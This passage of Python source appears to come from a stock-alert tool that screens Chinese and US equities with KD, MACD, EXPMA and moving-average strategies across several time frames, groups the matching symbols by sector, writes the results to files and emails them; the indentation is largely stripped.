for symbol_tmp in context.symbols[sector_tmp]:
results = {}
try:
runStrategies(transientresult100, symbol_tmp, sector_tmp,
context, resultdata, results)
except BaseException as be:
logger.debug("runStrategies is failed, symbol is {}".format(symbol_tmp))
logger.error("runStrategies is failed, symbol is {}".format(symbol_tmp), be)
totalresultdata[sector_tmp] = resultdata
return totalresultdata
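# Shape of the value returned by quantstrategies(), as consumed by
# mergeresult(): {sector_code: {symbol: {strategy_name: result_dataframe}}}.
# Walking sketch (illustrative only, not called anywhere):
def _example_walk_results(totalresultdata: dict):
    for sector_code, per_symbol in totalresultdata.items():
        for symbol, per_strategy in per_symbol.items():
            for strategy_name, frame in per_strategy.items():
                yield sector_code, symbol, strategy_name, len(frame)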
def runStrategies(transientresult100, symbol_tmp, sector_tmp, context,
resultdata, results):
with lock_qm:
length_totalresult100 = len(transientresult100)
issymbolintotalresult100 = symbol_tmp in transientresult100
if length_totalresult100 > 0:
if not issymbolintotalresult100:
return False
else:
dataset_240 = context.data240mins[sector_tmp].get(symbol_tmp)
if len(dataset_240) == 0:
return False
strategy_dayk = StrategyBasedOnDayKAction(dataset_240)
valid_240_amplitude, result_amplitude_240 = strategy_dayk.executeaction(operation='amplitude_avg')
if valid_240_amplitude:
if len(result_amplitude_240) > 0:
results[DataContext.strategy100] = result_amplitude_240
resultdata[symbol_tmp] = results
else:
return False
else:
logger.error("strategy_amplitude_avg_240 is failed on {}".format(symbol_tmp))
return False
dataset_240 = context.data240mins[sector_tmp].get(symbol_tmp)
expma_cross_240 = EXPMACrossAction(dataset_240)
valid_expma_240, value_240_expma = expma_cross_240.executeaction()
if valid_expma_240:
if len(value_240_expma) > 0:
results[DataContext.strategy8] = value_240_expma
resultdata[symbol_tmp] = results
else:
logger.error("strategy_expma_cross_240 is failed on {}".format(symbol_tmp))
dataset_30 = context.data30mins[sector_tmp].get(symbol_tmp)
expma_cross_30 = EXPMACrossAction(dataset_30)
valid_expma_30, value_30_expma = expma_cross_30.executeaction()
if valid_expma_30:
if len(value_30_expma) > 0:
results[DataContext.strategy9] = value_30_expma
resultdata[symbol_tmp] = results
else:
logger.error("strategy_expma_cross_30 is failed on {}".format(symbol_tmp))
dataset_60 = context.data60mins[sector_tmp].get(symbol_tmp)
if len(dataset_60) == 0:
return False
expma_cross_60 = EXPMACrossAction(dataset_60)
valid_expma_60, value_60_expma = expma_cross_60.executeaction()
if valid_expma_60:
if len(value_60_expma) > 0:
results[DataContext.strategy10] = value_60_expma
resultdata[symbol_tmp] = results
else:
logger.error("strategy_expma_cross_60 is failed on {}".format(symbol_tmp))
kd_60 = StrategyBasedOnKDAction(dataset_60)
valid_60_kd_cross, result_kd_cross_60 = kd_60. \
executeaction(occurrence_time=[dataset_60.index[-1]],
operation='cross_up')
if valid_60_kd_cross:
if len(result_kd_cross_60) > 0:
macd_cross_60 = StrategyBasedonMACDAction(dataset_60, 2)
valid_60_macd_cross, result_macd_cross_60 = macd_cross_60.executeaction(operation='cross_up')
if valid_60_macd_cross:
if len(result_macd_cross_60) > 0:
results[DataContext.strategy11] = result_macd_cross_60
resultdata[symbol_tmp] = results
else:
logger.error("strategy_macd_cross_up_60 is failed on {}".format(symbol_tmp))
else:
logger.error("strategy_kd_cross_up_60 is failed on {}".format(symbol_tmp))
# FIXME
'''
valid_60_kd_deviate, result_kd_deviate_60 = kd_60. \
executeaction(occurrence_time=[dataset_60.index[-1]],
operation='divergence_price_lower_and_k_higher')
if valid_60_kd_deviate:
if len(result_kd_deviate_60) > 0:
results[DataContext.strategyx] = result_kd_deviate_60
resultdata[symbol_tmp] = results
else:
logger.error("strategy_kd_deviate_60 is failed on {}".format(symbol_tmp))
'''
valid_60_kd_deviate, result_kd_deviate_60 = kd_60. \
executeaction(occurrence_time=[dataset_60.index[-1]],
operation='divergence_price_lower_and_k_higher_simple',
duration=20)
if valid_60_kd_deviate:
if len(result_kd_deviate_60) > 0:
results[DataContext.strategy12] = result_kd_deviate_60
resultdata[symbol_tmp] = results
else:
logger.error("strategy_kd_deviate_60 is failed on {}".format(symbol_tmp))
price_kavg_60 = StrategyBasedOnDayKAction(dataset_60)
valid_60_price_ma, result_price_ma_60 = price_kavg_60.executeaction(operation='price_k_avg')
if valid_60_price_ma:
if len(result_price_ma_60) > 0:
valid_60_entangle_crossup_period, result_entangle_crossup_period_60 = \
kd_60.executeaction(occurrence_time=[dataset_60.index[-1]],
operation='entangle_and_cross_up_within_period',
periods=4,
duration=40)
if valid_60_entangle_crossup_period:
if len(result_entangle_crossup_period_60) > 0:
results[DataContext.strategy13] = result_entangle_crossup_period_60
resultdata[symbol_tmp] = results
else:
logger.error("strategy_kd_entangle_and_cross_up_60 is failed on {}".format(symbol_tmp))
valid_60_entangle_period, result_entangle_period_60 = \
kd_60.executeaction(occurrence_time=[dataset_60.index[-1]],
operation='entangle_within_period',
periods=4,
duration=40)
if valid_60_entangle_period:
if len(result_entangle_period_60) > 0:
valid_30_crossup, result_crossup_30 = \
StrategyBasedOnKDAction(dataset_30).executeaction(
occurrence_time=[dataset_30.index[-1]],
operation='cross_up')
if valid_30_crossup:
if len(result_crossup_30) > 0:
results[DataContext.strategy14] = result_crossup_30
resultdata[symbol_tmp] = results
else:
logger.error("strategy_kd_cross_up_30 is failed on {}".format(symbol_tmp))
else:
logger.error("strategy_kd_entangle_60 is failed on {}".format(symbol_tmp))
else:
logger.error("strategy_price_ma_60 is failed on {}".format(symbol_tmp))
ma_go_60 = StrategyBasedOnDayKAction(dataset_60)
valid_60_ma, result_ma_60 = ma_go_60.executeaction(operation='avg_k_go')
if valid_60_ma:
if len(result_ma_60) > 0:
results[DataContext.strategy102] = result_ma_60
resultdata[symbol_tmp] = results
else:
return False
else:
logger.error("strategy_ma_avg_60 is failed on {}".format(symbol_tmp))
return False
expma_go_60 = StrategyBasedOnDayKAction(dataset_60)
valid_60_expema_dif, result_expema_dif_60 = expma_go_60.executeaction(operation='expma_dif_go')
if valid_60_expema_dif:
if len(result_expema_dif_60) > 0:
results[DataContext.strategy104] = result_expema_dif_60
resultdata[symbol_tmp] = results
else:
return False
else:
logger.error("strategy_expma_dif_go_60 is failed on {}".format(symbol_tmp))
return False
macd_go_60 = StrategyBasedonMACDAction(dataset_60, 2)
ismacd_strict = False
ismacd_diff = False
valid_60_macd_strict, result_macd_strict_60 = macd_go_60.executeaction(operation='strict')
if valid_60_macd_strict:
if len(result_macd_strict_60) > 0:
results[DataContext.strategy101] = result_macd_strict_60
resultdata[symbol_tmp] = results
ismacd_strict = True
else:
logger.error("strategy_macd_strict_60 is failed on {}".format(symbol_tmp))
if not ismacd_strict:
valid_60_macd_dif, result_macd_dif_60 = macd_go_60.executeaction(operation='dif')
if valid_60_macd_dif:
if len(result_macd_dif_60) > 0:
results[DataContext.strategy103] = result_macd_dif_60
resultdata[symbol_tmp] = results
ismacd_diff = True
else:
logger.error("strategy_macd_diff_60 is failed on {}".format(symbol_tmp))
if not ismacd_strict and not ismacd_diff:
return False
'''
dataset_30 = context.data30mins[sector_tmp].get(symbol_tmp)
kd_cross_30 = StrategyBasedOnKDAction(dataset_30)
kd_indicator_30 = KDAction(dataset_30, context.rsv_period, context.k_period, context.d_period)
valid_kd_30, k_v_30, d_v_30 = kd_indicator_30.executeaction()
ma_cross = CROSSUpMAAction(context.data15mins[sector_tmp].get(symbol_tmp))
valid, result_tmp = ma_cross.executeaction(startindex=context.start_i, endindex=context.end_i,
cross_period=context.cross_sma_period,
greater_period=context.greater_than_sma_period)
if valid:
if len(result_tmp) > 0:
time_sequence = []
for time_stamp_original in result_tmp['time'].array:
tmp_date = datetime.date(year=time_stamp_original.year, month=time_stamp_original.month,
day=time_stamp_original.day)
if time_stamp_original.minute == 0:
time_stamp = time_stamp_original
elif time_stamp_original.minute <= 30:
time_stamp = pd.Timestamp(datetime.datetime.combine(tmp_date,
datetime.time(
hour=time_stamp_original.hour,
minute=30)))
else:
time_stamp = pd.Timestamp(datetime.datetime.combine(tmp_date,
datetime.time(
hour=time_stamp_original.hour + 1)))
time_sequence.append(time_stamp)
if not valid_kd_30:
logger.error("strategy_cross_kd_30 is failed on {}".format(symbol_tmp))
else:
valid, result_tmp = kd_cross_30.executeaction(occurrence_time=time_sequence,
operation='cross_up',
KValues=k_v_30,
DValues=d_v_30,
crossvalue=(False, 0))
if valid:
# FIXME
if len(result_tmp) > 0:
obv_up = OBVUpACTION(context.data30mins[sector_tmp].get(symbol_tmp))
valid, result_tmp = obv_up.executeaction(occurrence_time=result_tmp['time'],
obv_period=context.obv_period,
obv_a_period=context.obv_a_period)
if valid:
if len(result_tmp) > 0:
results[DataContext.strategy1] = result_tmp
resultdata[symbol_tmp] = results
else:
logger.error("strategy_obv_up_30 is failed on {}".format(symbol_tmp))
if len(result_tmp) > 0:
results[DataContext.strategy1] = result_tmp
resultdata[symbol_tmp] = results
else:
logger.error("strategy_cross_kd_30 is failed on {}".format(symbol_tmp))
else:
logger.error("strategy_cross_70 is failed on {}".format(symbol_tmp))
if not valid_kd_30:
logger.error("strategy_entangle_crossup_kd_30 is failed on {}".format(symbol_tmp))
else:
valid_30_entangle_crossup_period, result_entangle_crossup_period_30 = \
kd_cross_30.executeaction(occurrence_time=[dataset_30.index[-1]],
operation='entangle_and_cross_up_within_period',
KValues=k_v_30,
DValues=d_v_30,
periods=4,
duration=80,
crossvalue=(False, 0))
if valid_30_entangle_crossup_period:
if len(result_entangle_crossup_period_30) > 0:
results[DataContext.strategy6] = result_entangle_crossup_period_30
resultdata[symbol_tmp] = results
else:
logger.error("strategy_entangle_crossup_kd_30 is failed on {}".format(symbol_tmp))
valid_60, result_tmp_60 = kd_60.executeaction(occurrence_time=[dataset_60.index[-1]],
operation='cross_up',
crossvalue=(True, 30))
if valid_60:
if len(result_tmp_60) > 0:
results[DataContext.strategy2] = result_tmp_60
resultdata[symbol_tmp] = results
else:
logger.error("strategy_cross_kd_60 is failed on {}".format(symbol_tmp))
valid_60_entangle, result_entangle_60 = kd_60.executeaction(occurrence_time=[dataset_60.index[-1]],
operation='entangle',
crossvalue=(True, 30),
periods=4)
if valid_60_entangle:
if len(result_entangle_60) > 0:
results[DataContext.strategy3] = result_entangle_60
resultdata[symbol_tmp] = results
else:
logger.error("strategy_entangle_kd_60 is failed on {}".format(symbol_tmp))
'''
valid_60_entangle_crossup_period, result_entangle_crossup_period_60 = \
kd_60.executeaction(occurrence_time=[dataset_60.index[-1]],
operation='entangle_and_cross_up_within_period',
periods=4,
duration=40)
if valid_60_entangle_crossup_period:
if len(result_entangle_crossup_period_60) > 0:
if ismacd_diff:
results[DataContext.strategy7] = result_entangle_crossup_period_60
elif ismacd_strict:
results[DataContext.strategy5] = result_entangle_crossup_period_60
resultdata[symbol_tmp] = results
else:
logger.error("strategy_entangle_crossup_period_kd_60 is failed on {}".format(symbol_tmp))
if not ismacd_strict:
return False
valid_60_entangle_crossup, result_entangle_crossup_60 = \
kd_60.executeaction(occurrence_time=[dataset_60.index[-1]],
operation='entangle_and_cross_up',
periods=4)
if valid_60_entangle_crossup:
if len(result_entangle_crossup_60) > 0:
results[DataContext.strategy4] = result_entangle_crossup_60
resultdata[symbol_tmp] = results
else:
logger.error("strategy_entangle_crossup_kd_60 is failed on {}".format(symbol_tmp))
return True
# FIXME because EM has been obsoleted.
def calcrankofchange():
if DataContext.iscountryChina():
prefix = "B_"
current_date = datetime.datetime.now().strftime("%Y-%m-%d")
# offset by N trading days
date_offset = c.getdate(current_date, -11, "Market=CNSESH")
if date_offset.ErrorCode != 0:
logger.error("ErrorCode is %d and ErrorMsg is %s" % (date_offset.ErrorCode, date_offset.ErrorMsg))
return False
# interval change percent (float-market-cap weighted average): CPPCTCHANGEFMWAVG; interval net capital inflow: PNETINFLOWSUM
sectors_q = list(sectors_CN.keys())
i = 1
sectors_length = len(sectors_q) - 6
sectors_v = []
while i < sectors_length:
j = i + 6
if j > sectors_length:
j = sectors_length
sectors_g = ",".join(map(lambda x: prefix + x, sectors_q[i:j]))
sector_data = c.cses(sectors_g, "CPPCTCHANGEFMWAVG,PNETINFLOWSUM",
"StartDate={},EndDate={}, IsHistory=0, Ispandas=1, ShowBlank=0".format(
date_offset.Data[0], current_date))
sectors_v.append(sector_data)
i += 6
logger.debug("%d sectors has been scanned" % (sectors_length - 1))
sectors_df = pd.concat(sectors_v)
sectors_df_change_d = sectors_df.sort_values(by='CPPCTCHANGEFMWAVG', ascending=False)
sectors_df_mf_d = sectors_df.sort_values(by='PNETINFLOWSUM', ascending=False)
sectors_list_change_d = sectors_df_change_d.index.tolist()
sectors_list_mf_d = sectors_df_mf_d.index.tolist()
if len(sectors_df) > 50:
list_sectors_change = sectors_list_change_d[:50]
list_sectors_change_r = sectors_list_change_d[:-51:-1]
list_sectors_mf = sectors_list_mf_d[:50]
list_sectors_mf_r = sectors_list_mf_d[:-51:-1]
else:
list_sectors_change = sectors_list_change_d
list_sectors_change_r = sectors_list_change_d[::-1]
list_sectors_mf = sectors_list_mf_d
list_sectors_mf_r = sectors_list_mf_d[::-1]
e_subject = "版块排名_" + datetime.datetime.now().strftime("%Y%m%d")
e_content = ""
filepath = os.path.join(DataContext.dir_name, e_subject)
with open(filepath, 'w+') as file:
tmp_str = "涨幅版块排名\r\n"
file.write(tmp_str)
e_content += tmp_str
for index in list_sectors_change:
column = sectors_df_change_d['CPPCTCHANGEFMWAVG']
sector_name = sectors_CN[index.lstrip(prefix)]
tmp_str = "版块名称: {} -- 幅度: {}% \r\n".format(sector_name, column[index])
file.write(tmp_str)
e_content += tmp_str
tmp_str = "\r\n跌幅版块排名\r\n"
file.write(tmp_str)
e_content += tmp_str
for index in list_sectors_change_r:
column = sectors_df_change_d['CPPCTCHANGEFMWAVG']
sector_name = sectors_CN[index.lstrip(prefix)]
tmp_str = "版块名称: {} -- 幅度: {}% \r\n".format(sector_name, column[index])
file.write(tmp_str)
e_content += tmp_str
tmp_str = "\r\n资金净流入版块排名 - 从高到低\r\n"
file.write(tmp_str)
e_content += tmp_str
for index in list_sectors_mf:
column = sectors_df_mf_d['PNETINFLOWSUM']
sector_name = sectors_CN[index.lstrip(prefix)]
tmp_str = "版块名称: {} -- 资金: {} \r\n".format(sector_name, column[index])
file.write(tmp_str)
e_content += tmp_str
tmp_str = "\r\n资金净流入版块排名 - 从低到高\r\n"
file.write(tmp_str)
e_content += tmp_str
for index in list_sectors_mf_r:
column = sectors_df_mf_d['PNETINFLOWSUM']
sector_name = sectors_CN[index.lstrip(prefix)]
tmp_str = "版块名称: {} -- 资金: {} \r\n".format(sector_name, column[index])
file.write(tmp_str)
e_content += tmp_str
sendemail(e_subject, e_content, DataContext.email_recipient)
sendemail(e_subject, e_content, DataContext.email_other1_recipient)
sendemail(e_subject, e_content, DataContext.email_other2_recipient)
def summarytotalresult(context: DataContext):
e_subject = "预警汇总_" + datetime.datetime.now().strftime("%Y%m%d")
e_content = ""
filepath = os.path.join(DataContext.dir_name, e_subject)
with open(filepath, 'w+') as file:
for strategy_t, symbols in context.totalresult.items():
str101 = ""
if strategy_t == DataContext.strategy6:
str101 = "\r\n\r\n\r\n\r\n\r\n策略6 - 30分钟周期\r\n"
elif strategy_t == DataContext.strategy14:
str101 = "\r\n\r\n\r\n\r\n\r\n策略14 - 30分钟周期:\r\n"
elif strategy_t == DataContext.strategy13:
str101 = "\r\n\r\n\r\n\r\n\r\n策略13 - 60分钟周期:\r\n"
elif strategy_t == DataContext.strategy12:
str101 = "\r\n\r\n\r\n\r\n\r\n策略12 - 日周期:\r\n"
elif strategy_t == DataContext.strategy11:
str101 = "\r\n\r\n\r\n\r\n\r\n策略11 - 60分钟周期:\r\n"
elif strategy_t == DataContext.strategy10:
str101 = "\r\n\r\n\r\n\r\n\r\n策略10 - 60分钟周期:\r\n"
elif strategy_t == DataContext.strategy9:
str101 = "\r\n\r\n\r\n\r\n\r\n策略9 - 30分钟周期:\r\n"
elif strategy_t == DataContext.strategy8:
str101 = "\r\n\r\n\r\n\r\n\r\n策略8 - 日周期:\r\n"
elif strategy_t == DataContext.strategy7:
str101 = "\r\n\r\n\r\n\r\n\r\n策略7 - 60分钟周期:\r\n"
elif strategy_t == DataContext.strategy5:
str101 = "\r\n\r\n\r\n\r\n\r\n策略5 - 60分钟周期:\r\n"
elif strategy_t == DataContext.strategy4:
str101 = "\r\n\r\n\r\n\r\n\r\n策略4 - 60分钟周期:\r\n"
elif strategy_t == DataContext.strategy3:
str101 = "\r\n\r\n\r\n\r\n\r\n策略3 - 60分钟周期:\r\n"
elif strategy_t == DataContext.strategy1:
str101 = "\r\n\r\n\r\n\r\n\r\n策略1 - 15分钟周期:\r\n"
elif strategy_t == DataContext.strategy2:
str101 = "\r\n\r\n\r\n\r\n\r\n策略2 - 60分钟周期:\r\n"
elif strategy_t == DataContext.strategy1_2:
str101 = "\r\n\r\n\r\n\r\n\r\n同时满足策略1和策略2的预警条件:\r\n\r\n"
elif strategy_t == DataContext.strategy1_4:
str101 = "\r\n\r\n\r\n\r\n\r\n同时满足策略1和策略4的预警条件:\r\n\r\n"
if str101 != "":
file.write(str101)
e_content += str101
symbols_str = " ".join(symbols.keys())
file.write(symbols_str)
e_content += symbols_str
sendemail(e_subject, e_content, DataContext.email_recipient)
# FIXME
# sendemail(e_subject, e_content, DataContext.email_other1_recipient)
# sendemail(e_subject, e_content, DataContext.email_other2_recipient)
# this function runs in a separate thread
@time_measure
def handleresult(context: DataContext):
while True:
resultfromq = context.queue.get()
if isinstance(resultfromq, ProcessStatus) and resultfromq == ProcessStatus.STOP:
logger.debug("The thread of handleresult quits")
break
subject_e1, content_e1, subject_e2, content_e2 = handleresultlocked(mergeresult(context, resultfromq), context)
logger.debug("handleresultlocked was done")
# send it via sina email
time_cur = datetime.datetime.now()
if datetime.datetime.combine(datetime.date(year=time_cur.year, month=time_cur.month, day=time_cur.day),
context.marketclosetime) - time_cur <= datetime.timedelta(minutes=DataContext.sendemial_interval) \
or context.sendemailtime is None \
or time_cur - context.sendemailtime >= datetime.timedelta(minutes=DataContext.sendemial_interval):
sendemail(subject_e1, content_e1, DataContext.email_recipient)
context.sendemailtime = time_cur
class CalcResult:
def __init__(self, ctime, isvgreater: bool):
self.cross_time = ctime
self.isgreater_v = isvgreater
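# CalcResult pairs the time at which a strategy fired (cross_time: either the
# snapshot key time or, for historical rows, column 6 of the result frame)
# with the boolean flag taken from column 7 of the frame (isgreater_v).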
def mergeresult(context: DataContext, result_transient, ishistory: bool = False):
def assembleFunc(symbol, strategy: str):
symbol_s = str(symbol)
symbols[strategy].append(symbol_s)
if ishistory:
append_value(context.totalresult[strategy], symbol_s, CalcResult(row[6], row[7]))
else:
append_value(context.totalresult[strategy], symbol_s, CalcResult(keytime, row[7]))
def calcresult(strategy_n: str):
# result_c = set(symbols[strategy_n]).intersection(result_c_s100)
result_c = set(symbols[strategy_n])
logger.info("%d symbols found with %s at %s" % (len(result_c), strategy_n, keytime))
return result_c
# result_h_s1 = set(context.totalresult[DataContext.strategy1].keys())
# result_h_s2 = set(context.totalresult[DataContext.strategy2].keys())
# result_h_s3 = set(context.totalresult[DataContext.strategy3].keys())
result_h_s4 = set(context.totalresult[DataContext.strategy4].keys())
result_h_s5 = set(context.totalresult[DataContext.strategy5].keys())
result_h_s7 = set(context.totalresult[DataContext.strategy7].keys())
result_h_s8 = set(context.totalresult[DataContext.strategy8].keys())
result_h_s9 = set(context.totalresult[DataContext.strategy9].keys())
result_h_s10 = set(context.totalresult[DataContext.strategy10].keys())
result_h_s11 = set(context.totalresult[DataContext.strategy11].keys())
result_h_s12 = set(context.totalresult[DataContext.strategy12].keys())
result_h_s13 = set(context.totalresult[DataContext.strategy13].keys())
result_h_s14 = set(context.totalresult[DataContext.strategy14].keys())
keytime = datetime.datetime.now()
symbols = {DataContext.strategy1: [], DataContext.strategy2: [], DataContext.strategy3: [], DataContext.strategy4: [],
DataContext.strategy5: [], DataContext.strategy6: [], DataContext.strategy100: [], DataContext.strategy101: [],
DataContext.strategy102: [], DataContext.strategy7: [], DataContext.strategy103: [], DataContext.strategy8: [],
DataContext.strategy104: [], DataContext.strategy9: [], DataContext.strategy10: [], DataContext.strategy11: [],
DataContext.strategy12: [], DataContext.strategy13: [], DataContext.strategy14: []}
global lock_qm
with lock_qm:
for time_result, result in result_transient.items():
keytime = time_result
for index, value in result.items():
for index_1, value_1 in value.items():
for index_2, value_2 in value_1.items():
'''
if index_2 == DataContext.strategy1:
for row in value_2.itertuples(index=False):
if row[7]:
assembleFunc(index_1, DataContext.strategy1)
elif index_2 == DataContext.strategy2:
for row in value_2.itertuples(index=False):
if row[2] <= 50:
assembleFunc(index_1, DataContext.strategy2)
elif index_2 == DataContext.strategy3:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy3)
'''
if index_2 == DataContext.strategy4:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy4)
elif index_2 == DataContext.strategy5:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy5)
elif index_2 == DataContext.strategy100:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy100)
elif index_2 == DataContext.strategy101:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy101)
elif index_2 == DataContext.strategy102:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy102)
elif index_2 == DataContext.strategy7:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy7)
elif index_2 == DataContext.strategy103:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy103)
elif index_2 == DataContext.strategy104:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy104)
elif index_2 == DataContext.strategy8:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy8)
elif index_2 == DataContext.strategy9:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy9)
elif index_2 == DataContext.strategy10:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy10)
elif index_2 == DataContext.strategy11:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy11)
elif index_2 == DataContext.strategy12:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy12)
elif index_2 == DataContext.strategy13:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy13)
elif index_2 == DataContext.strategy14:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy14)
'''
elif index_2 == DataContext.strategy6:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy6)
'''
calcresult(DataContext.strategy100)
calcresult(DataContext.strategy101)
calcresult(DataContext.strategy102)
calcresult(DataContext.strategy103)
calcresult(DataContext.strategy104)
# result_c_s1 = calcresult(DataContext.strategy1)
# result_c_s2 = calcresult(DataContext.strategy2)
# result_c_s3 = calcresult(DataContext.strategy3)
result_c_s4 = calcresult(DataContext.strategy4)
result_c_s5 = calcresult(DataContext.strategy5)
result_c_s7 = calcresult(DataContext.strategy7)
result_c_s8 = calcresult(DataContext.strategy8)
result_c_s9 = calcresult(DataContext.strategy9)
result_c_s10 = calcresult(DataContext.strategy10)
result_c_s11 = calcresult(DataContext.strategy11)
result_c_s12 = calcresult(DataContext.strategy12)
result_c_s13 = calcresult(DataContext.strategy13)
result_c_s14 = calcresult(DataContext.strategy14)
# result_c_s6 = calcresult(DataContext.strategy6)
# result_c_s1_2 = result_c_s1.intersection(result_c_s2).union(result_c_s1.intersection(result_h_s2))
# result_h_s1_2 = result_h_s1.intersection(result_h_s2).union(result_h_s1.intersection(result_c_s2))
# for result_1_2 in result_c_s1_2:
# append_value(context.totalresult[DataContext.strategy1_2], result_1_2, CalcResult(keytime, True))
# logger.info("%d symbols found with strategy 1 and 2 at %s" % (len(result_c_s1_2), keytime))
# result_c_s1_4 = result_c_s1.intersection(result_c_s4).union(result_c_s1.intersection(result_h_s4))
# result_h_s1_4 = result_h_s1.intersection(result_h_s4).union(result_h_s1.intersection(result_c_s4))
# for result_1_4 in result_c_s1_4:
# append_value(context.totalresult[DataContext.strategy1_4], result_1_4, CalcResult(keytime, True))
# logger.info("%d symbols found with strategy 1 and 4 at %s" % (len(result_c_s1_4), keytime))
'''
ret = {keytime: {DataContext.strategy5: [result_c_s5, result_h_s5],
DataContext.strategy4: [result_c_s4, result_h_s4],
DataContext.strategy1_4: [result_c_s1_4, result_h_s1_4],
DataContext.strategy3: [result_c_s3, result_h_s3],
DataContext.strategy1_2: [result_c_s1_2, result_h_s1_2],
DataContext.strategy1: [result_c_s1, result_h_s1],
DataContext.strategy2: [result_c_s2, result_h_s2],
# DataContext.strategy6: [result_c_s6, result_h_s6]}}
'''
ret = {keytime: {DataContext.strategy14: [result_c_s14, result_h_s14],
DataContext.strategy13: [result_c_s13, result_h_s13],
DataContext.strategy12: [result_c_s12, result_h_s12],
DataContext.strategy11: [result_c_s11, result_h_s11],
DataContext.strategy8: [result_c_s8, result_h_s8],
DataContext.strategy10: [result_c_s10, result_h_s10],
DataContext.strategy9: [result_c_s9, result_h_s9],
DataContext.strategy7: [result_c_s7, result_h_s7],
DataContext.strategy5: [result_c_s5, result_h_s5],
DataContext.strategy4: [result_c_s4, result_h_s4]}}
return ret
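# The dict returned above maps the snapshot time to, per strategy, a pair of
# sets: [symbols that fired in this round, symbols already recorded today].
# Consumer sketch (illustrative; mirrors how handleresultlocked() reads it):
def _example_count_hits(merged: dict):
    for keytime, per_strategy in merged.items():
        for strategy_name, (current_set, history_set) in per_strategy.items():
            print(keytime, strategy_name, len(current_set), len(history_set))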
def handleresultlocked(resultf, context: DataContext):
emailcontent = ""
emailcontent_em = ""
def sortout(result_t: list):
max_num = 5
result_ch = {}
email_c: str = ""
email_p: str = ""
none_sector = "无归属版块"
if DataContext.iscountryChina():
sectornames = sectors_CN
spotlightedsector = sectornames['000001']
print_order = [spotlightedsector]
else:
sectornames = sectors_US
spotlightedsector = sectornames['000001']
print_order = [spotlightedsector]
for symbol_c in result_t:
for index_s, value_s in context.sectors.items():
if (isinstance(value_s, list) and symbol_c in value_s) or symbol_c == value_s:
append_value(result_ch, sectornames[index_s], symbol_c)
break
else:
append_value(result_ch, none_sector, symbol_c)
for index_s in result_ch:
if index_s != none_sector and index_s != spotlightedsector:
print_order.append(index_s)
else:
print_order.append(none_sector)
for index_s_o in print_order:
if index_s_o not in result_ch:
continue
value_s_o = result_ch[index_s_o]
str2 = "%s:\r\n" % index_s_o
email_c += str2
file.write(str2)
if isinstance(value_s_o, list):
while len(value_s_o) > 0:
if len(value_s_o) > max_num:
list_tmp = []
for i in range(max_num):
list_tmp.append(value_s_o.pop())
str3 = " ".join(list_tmp)
str_p = " ".join(list_tmp)
else:
str3 = " ".join(value_s_o)
str_p = " ".join(value_s_o)
value_s_o.clear()
str3 += "\r\n"
str_p += "\r\n"
email_c += str3
email_p += str_p
file.write(str3)
else:
str3 = value_s_o + "\r\n"
str_p = value_s_o + "\r\n"
email_c += str3
email_p += str_p
file.write(str3)
return email_c, email_p
def output(criteria):
emailcontent_i = ""
emailcontent_em_i = ""
emailcontent_i += criteria
file.write(criteria)
str7 = "当前满足条件的股票代码:\r\n\r\n"
emailcontent_i += str7
file.write(str7)
result_hm, result_em = sortout(symbols_l[0])
emailcontent_i += result_hm
emailcontent_em_i += result_em
str8 = "\r\n\r\n"
emailcontent_i += str8
file.write(str8)
str9 = "今日历史上满足条件的股票代码:\r\n\r\n"
emailcontent_i += str9
file.write(str9)
result_hm, result_em = sortout(symbols_l[1])
emailcontent_i += result_hm
return emailcontent_i, emailcontent_em_i
# format and output the symbols grouped by sector
for time_result, result in resultf.items():
filename = "result_" + time_result.strftime("%Y%m%d_%H%M")
filename_em = "EM_" + filename
filepath = os.path.join(DataContext.dir_name, filename)
with open(filepath, 'w+') as file:
for strategy_t, symbols_l in result.items():
str101 = ""
if strategy_t == DataContext.strategy6:
str101 = "\r\n\r\n\r\n\r\n\r\n策略6 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 0. MACD指标在60分钟周期上当前向上且快线大于慢线\r\n"
str101 += " 0. 20均线指标在60分钟周期上当前向上\r\n"
str101 += " 0. EXPMA指标在60分钟周期上快线当前向上\r\n"
str101 += " 1. KD指标在30分钟周期上在最近10天内至少存在一个至少连续4个周期的纠缠\r\n"
str101 += " 2. KD指标在30分钟周期形成金叉\r\n\r\n"
elif strategy_t == DataContext.strategy14:
str101 = "\r\n\r\n\r\n\r\n\r\n策略14 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 1. 股价在60分钟周期上20均线指标之下\r\n"
str101 += " 2. KD指标在60分钟周期上在最近10天内至少存在一个至少连续4个周期的纠缠\r\n"
str101 += " 3. KD指标在30分钟周期形成金叉\r\n\r\n"
elif strategy_t == DataContext.strategy13:
str101 = "\r\n\r\n\r\n\r\n\r\n策略13 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 1. 股价在60分钟周期上20均线指标之下\r\n"
str101 += " 2. KD指标在60分钟周期上在最近10天内至少存在一个至少连续4个周期的纠缠\r\n"
str101 += " 3. KD指标在60分钟周期形成金叉\r\n\r\n"
elif strategy_t == DataContext.strategy12:
str101 = "\r\n\r\n\r\n\r\n\r\n策略12 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 1. 当前K线值大于前五天的kd金叉的交叉点的5%\r\n"
str101 += " 1. 当前收盘价比前五天内的最低价再低1%\r\n"
elif strategy_t == DataContext.strategy11:
